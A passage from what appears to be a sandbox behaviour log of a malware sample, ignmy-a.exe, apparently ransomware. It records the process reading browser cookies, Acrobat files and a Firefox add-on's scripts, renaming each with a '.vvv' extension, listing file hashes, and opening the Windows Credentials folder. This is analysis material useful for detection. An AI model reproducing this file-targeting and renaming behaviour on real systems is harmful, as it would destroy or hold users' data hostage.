  10164.     828     1198
  10165. File   
  10166. Rename
  10167.    
  10168. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt
  10169. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udlog.txt.vvv
  10170.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10171.  MD5:  470073e1dd1beba9d5a04b19a0318f70
  10172.  SHA1: f07f6682e9172f35c162dbfb290374b0498936a8
  10173.     828     1198
  10174. File   
  10175. Open
  10176.    
  10177. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
  10178.     828     195
  10179. File   
  10180. Close
  10181.    
  10182. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
  10183.  MD5:  8c3fbd228ab63d44c689dc6358020dce
  10184.  SHA1: c818db14547e2f06b9ed028b04a40c2858d82961
  10185.     828     622
  10186. File   
  10187. Rename
  10188.    
  10189. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js
  10190. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\Updater\udstore.js.vvv
  10191.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10192.  MD5:  8c3fbd228ab63d44c689dc6358020dce
  10193.  SHA1: c818db14547e2f06b9ed028b04a40c2858d82961
  10194.     828     622
  10195. File   
  10196. Open
  10197.    
  10198. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
  10199.     828     566
  10200. File   
  10201. Close
  10202.    
  10203. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
  10204.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10205.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10206.     828     990
  10207. File   
  10208. Rename
  10209.    
  10210. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
  10211. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav.vvv
  10212.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10213.  MD5:  f4fd8bc8cf02daf4ad9301e5706cafad
  10214.  SHA1: 24ef513cdd97e97fb35b97febb6d8242f145dd11
  10215.     828     990
  10216. File   
  10217. Open
  10218.    
  10219. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
  10220.     828     36
  10221. File   
  10222. Close
  10223.    
  10224. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
  10225.  MD5:  53b09fb0b6570696fbda75236b5d41ed
  10226.  SHA1: 384df1890d7118c540e4237c1ead8aeaa9c73781
  10227.     828     462
  10228. File   
  10229. Rename
  10230.    
  10231. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
  10232. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav.vvv
  10233.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10234.  MD5:  53b09fb0b6570696fbda75236b5d41ed
  10235.  SHA1: 384df1890d7118c540e4237c1ead8aeaa9c73781
  10236.     828     462
  10237. File   
  10238. Open
  10239.    
  10240. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
  10241.     828     690
  10242. File   
  10243. Close
  10244.    
  10245. C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
  10246.  MD5:  9a292a758b37b5d7271aaa19d4da6543
  10247.  SHA1: a30bf63cb92fea7f35c508548e41e1f327a3d890
  10248.     828     1118
  10249. File   
  10250. Rename
  10251.    
  10252. Old Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
  10253. New Name:   C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav.vvv
  10254.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10255.  MD5:  9a292a758b37b5d7271aaa19d4da6543
  10256.  SHA1: a30bf63cb92fea7f35c508548e41e1f327a3d890
  10257.     828     1118
  10258. Folder 
  10259. Open
  10260.    
  10261. C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
  10262.     828      
  10263. API Call   
  10264.    
  10265.  API Name:  Sleep   Address:  0x0041f00b
  10266.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  10267.     828      
  10268. File   
  10269. Open
  10270.    
  10271. C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
  10272.     828     10381
  10273. File   
  10274. Close
  10275.    
  10276. C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
  10277.  MD5:  ca776c9e3854b73cbab402558023d5f3
  10278.  SHA1: dfc42d478184a996a4ded74663bea3e72ea5903b
  10279.     828     10798
  10280. File   
  10281. Rename
  10282.    
  10283. Old Name:   C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
  10284. New Name:   C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt.vvv
  10285.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10286.  MD5:  ca776c9e3854b73cbab402558023d5f3
  10287.  SHA1: dfc42d478184a996a4ded74663bea3e72ea5903b
  10288.     828     10798
  10289. File   
  10290. Open
  10291.    
  10292. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10293.   cookies.txt
  10294.     828     157
  10295. File   
  10296. Close
  10297.    
  10298. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10299.   cookies.txt
  10300.  MD5:  16f880df029212dc5b83869b7b89d07a
  10301.  SHA1: 642095a1581aa5774062df3733909a9660885430
  10302.     828     574
  10303. File   
  10304. Rename
  10305.    
  10306. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10307.   cookies.txt
  10308. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10309.   cookies.txt.vvv
  10310.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10311.  MD5:  16f880df029212dc5b83869b7b89d07a
  10312.  SHA1: 642095a1581aa5774062df3733909a9660885430
  10313.     828     574
  10314. File   
  10315. Open
  10316.    
  10317. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10318.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
  10319.     828     5393
  10320. File   
  10321. Close
  10322.    
  10323. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10324.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
  10325.  MD5:  9257a339bc16bfa83d4df49c7be0d0fc
  10326.  SHA1: 16e97dc6cf49936dc9c7cb02e4c27f6b2c23405f
  10327.     828     5822
  10328. File   
  10329. Rename
  10330.    
  10331. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10332.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js
  10333. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10334.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\bootstrap.js.vvv
  10335.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10336.  MD5:  9257a339bc16bfa83d4df49c7be0d0fc
  10337.  SHA1: 16e97dc6cf49936dc9c7cb02e4c27f6b2c23405f
  10338.     828     5822
  10339. File   
  10340. Open
  10341.    
  10342. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10343.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
  10344.     828     19915
  10345. File   
  10346. Close
  10347.    
  10348. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10349.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
  10350.  MD5:  a60058223f1423dd3df8c95a603ee797
  10351.  SHA1: 7bbdfcad0159251015a4ac6e64806f8022a6a70e
  10352.     828     20334
  10353. File   
  10354. Rename
  10355.    
  10356. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10357.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js
  10358. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10359.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\components\harness.js.vvv
  10360.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10361.  MD5:  a60058223f1423dd3df8c95a603ee797
  10362.  SHA1: 7bbdfcad0159251015a4ac6e64806f8022a6a70e
  10363.     828     20334
  10364. File   
  10365. Open
  10366.    
  10367. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10368.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\te
  10369.   st-page-worker.js
  10370.     828     905
  10371. File   
  10372. Close
  10373.    
  10374. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10375.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\te
  10376.   st-page-worker.js
  10377.  MD5:  a4602a49fde11fd3680173b70e64de5d
  10378.  SHA1: 080f7b7a73a945639c6c0dadf5173444af2985a6
  10379.     828     1326
  10380. File   
  10381. Rename
  10382.    
  10383. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10384.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\te
  10385.   st-page-worker.js
  10386. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10387.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-data\te
  10388.   st-page-worker.js.vvv
  10389.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10390.  MD5:  a4602a49fde11fd3680173b70e64de5d
  10391.  SHA1: 080f7b7a73a945639c6c0dadf5173444af2985a6
  10392.     828     1326
  10393. File   
  10394. Open
  10395.    
  10396. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10397.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\cli
  10398.   pboard.js
  10399.     828     7688
  10400. File   
  10401. Close
  10402.    
  10403. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10404.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\cli
  10405.   pboard.js
  10406.  MD5:  3d725056aed161d73444282db8a55f3f
  10407.  SHA1: baf89b44292a2a13c5aa836e54a0c4793a35b926
  10408.     828     8110
  10409. File   
  10410. Rename
  10411.    
  10412. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10413.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\cli
  10414.   pboard.js
  10415. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10416.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\cli
  10417.   pboard.js.vvv
  10418.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10419.  MD5:  3d725056aed161d73444282db8a55f3f
  10420.  SHA1: baf89b44292a2a13c5aa836e54a0c4793a35b926
  10421.     828     8110
  10422. File   
  10423. Open
  10424.    
  10425. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10426.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\con
  10427.   text-menu.js
  10428.     828     42249
  10429. File   
  10430. Close
  10431.    
  10432. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10433.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\con
  10434.   text-menu.js
  10435.  MD5:  be928e30b9548c9e5a1d87a02925e6be
  10436.  SHA1: f140ce34d62923d34c7e55938f63a2788b128626
  10437.     828     42670
  10438. File   
  10439. Rename
  10440.    
  10441. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10442.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\con
  10443.   text-menu.js
  10444. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10445.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\con
  10446.   text-menu.js.vvv
  10447.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10448.  MD5:  be928e30b9548c9e5a1d87a02925e6be
  10449.  SHA1: f140ce34d62923d34c7e55938f63a2788b128626
  10450.     828     42670
  10451. File   
  10452. Open
  10453.    
  10454. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10455.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hot
  10456.   keys.js
  10457.     828     2928
  10458. File   
  10459. Close
  10460.    
  10461. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10462.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hot
  10463.   keys.js
  10464.  MD5:  40ce8c542b2ef3138bc002d552a73a67
  10465.  SHA1: 977a6ca4a75d6e551ca5a755f15341828275a140
  10466.     828     3358
  10467. File   
  10468. Rename
  10469.    
  10470. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10471.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hot
  10472.   keys.js
  10473. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10474.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\hot
  10475.   keys.js.vvv
  10476.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10477.  MD5:  40ce8c542b2ef3138bc002d552a73a67
  10478.  SHA1: 977a6ca4a75d6e551ca5a755f15341828275a140
  10479.     828     3358
  10480. File   
  10481. Open
  10482.    
  10483. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10484.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\not
  10485.   ifications.js
  10486.     828     3970
  10487. API Call   
  10488.    
  10489.  API Name:  Sleep   Address:  0x0041f00b
  10490.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  10491.     828      
  10492. File   
  10493. Close
  10494.    
  10495. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10496.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\not
  10497.   ifications.js
  10498.  MD5:  54d1adc11e80dab2b38beeade4f37c4d
  10499.  SHA1: 2e7a29618d79abd068072b2e0f97de66cd361b4d
  10500.     828     4398
  10501. File   
  10502. Rename
  10503.    
  10504. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10505.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\not
  10506.   ifications.js
  10507. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10508.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\not
  10509.   ifications.js.vvv
  10510.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10511.  MD5:  54d1adc11e80dab2b38beeade4f37c4d
  10512.  SHA1: 2e7a29618d79abd068072b2e0f97de66cd361b4d
  10513.     828     4398
  10514. File   
  10515. Open
  10516.    
  10517. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10518.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10519.   e-mod.js
  10520.     828     8111
  10521. File   
  10522. Close
  10523.    
  10524. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10525.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10526.   e-mod.js
  10527.  MD5:  6f0dae913af72442293546ac04e0bd83
  10528.  SHA1: 0f26a41be23525f31f81a5849dc923f43f63f70e
  10529.     828     8526
  10530. File   
  10531. Rename
  10532.    
  10533. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10534.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10535.   e-mod.js
  10536. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10537.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10538.   e-mod.js.vvv
  10539.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10540.  MD5:  6f0dae913af72442293546ac04e0bd83
  10541.  SHA1: 0f26a41be23525f31f81a5849dc923f43f63f70e
  10542.     828     8526
  10543. File   
  10544. Open
  10545.    
  10546. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10547.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10548.   e-worker.js
  10549.     828     3813
  10550. File   
  10551. Close
  10552.    
  10553. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10554.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10555.   e-worker.js
  10556.  MD5:  86fd898e11de6e5504aa00499c83290f
  10557.  SHA1: a1c8744a84bd85e06539732fbe3e356cdf0627d4
  10558.     828     4238
  10559. File   
  10560. Rename
  10561.    
  10562. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10563.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10564.   e-worker.js
  10565. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10566.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pag
  10567.   e-worker.js.vvv
  10568.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10569.  MD5:  86fd898e11de6e5504aa00499c83290f
  10570.  SHA1: a1c8744a84bd85e06539732fbe3e356cdf0627d4
  10571.     828     4238
  10572. File   
  10573. Open
  10574.    
  10575. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10576.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pan
  10577.   el.js
  10578.     828     13423
  10579. File   
  10580. Close
  10581.    
  10582. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10583.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pan
  10584.   el.js
  10585.  MD5:  c12619f374f5b52d7dacc5aaa68f5dee
  10586.  SHA1: b5c9f43c5f23fef9e89582936dffad4e84a60105
  10587.     828     13838
  10588. File   
  10589. Rename
  10590.    
  10591. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10592.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pan
  10593.   el.js
  10594. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10595.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pan
  10596.   el.js.vvv
  10597.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10598.  MD5:  c12619f374f5b52d7dacc5aaa68f5dee
  10599.  SHA1: b5c9f43c5f23fef9e89582936dffad4e84a60105
  10600.     828     13838
  10601. File   
  10602. Open
  10603.    
  10604. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10605.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pas
  10606.   swords.js
  10607.     828     3318
  10608. File   
  10609. Close
  10610.    
  10611. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10612.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pas
  10613.   swords.js
  10614.  MD5:  9a1bf29d9c3b93f0956e7420a8c2ce9b
  10615.  SHA1: 5c91dd5ac9097874fd8029c2a212e145ccd56531
  10616.     828     3742
  10617. File   
  10618. Rename
  10619.    
  10620. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10621.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pas
  10622.   swords.js
  10623. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10624.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pas
  10625.   swords.js.vvv
  10626.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10627.  MD5:  9a1bf29d9c3b93f0956e7420a8c2ce9b
  10628.  SHA1: 5c91dd5ac9097874fd8029c2a212e145ccd56531
  10629.     828     3742
  10630. File   
  10631. Open
  10632.    
  10633. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10634.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pri
  10635.   vate-browsing.js
  10636.     828     4101
  10637. File   
  10638. Close
  10639.    
  10640. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10641.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pri
  10642.   vate-browsing.js
  10643.  MD5:  25657a4e076a5c2d147f1039cd0fcae5
  10644.  SHA1: 9b2dfd3051fb40dc9f024bca0abd140467d88399
  10645.     828     4526
  10646. File   
  10647. Rename
  10648.    
  10649. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10650.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pri
  10651.   vate-browsing.js
  10652. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10653.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\pri
  10654.   vate-browsing.js.vvv
  10655.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10656.  MD5:  25657a4e076a5c2d147f1039cd0fcae5
  10657.  SHA1: 9b2dfd3051fb40dc9f024bca0abd140467d88399
  10658.     828     4526
  10659. File   
  10660. Open
  10661.    
  10662. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10663.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\req
  10664.   uest.js
  10665.     828     10453
  10666. File   
  10667. Close
  10668.    
  10669. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10670.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\req
  10671.   uest.js
  10672.  MD5:  fa6d141156b034c925549038cf9c5444
  10673.  SHA1: 6fe05fc7a767ee060e287744509b503de84a598f
  10674.     828     10878
  10675. File   
  10676. Rename
  10677.    
  10678. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10679.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\req
  10680.   uest.js
  10681. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10682.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\req
  10683.   uest.js.vvv
  10684.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10685.  MD5:  fa6d141156b034c925549038cf9c5444
  10686.  SHA1: 6fe05fc7a767ee060e287744509b503de84a598f
  10687.     828     10878
  10688. File   
  10689. Open
  10690.    
  10691. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10692.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sel
  10693.   ection.js
  10694.     828     12316
  10695. File   
  10696. Close
  10697.    
  10698. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10699.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sel
  10700.   ection.js
  10701.  MD5:  6b3e8801b484d6ca85223d7362fc561d
  10702.  SHA1: cf49698cd57f481686561901fbd203ebf0c7f910
  10703.     828     12734
  10704. File   
  10705. Rename
  10706.    
  10707. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10708.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sel
  10709.   ection.js
  10710. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  10711.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-addon-kit-lib\sel
  10712.   ection.js.vvv
  10713.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  10714.  MD5:  6b3e8801b484d6ca85223d7362fc561d
  10715.  SHA1: cf49698cd57f481686561901fbd203ebf0c7f910
  10716.     828     12734
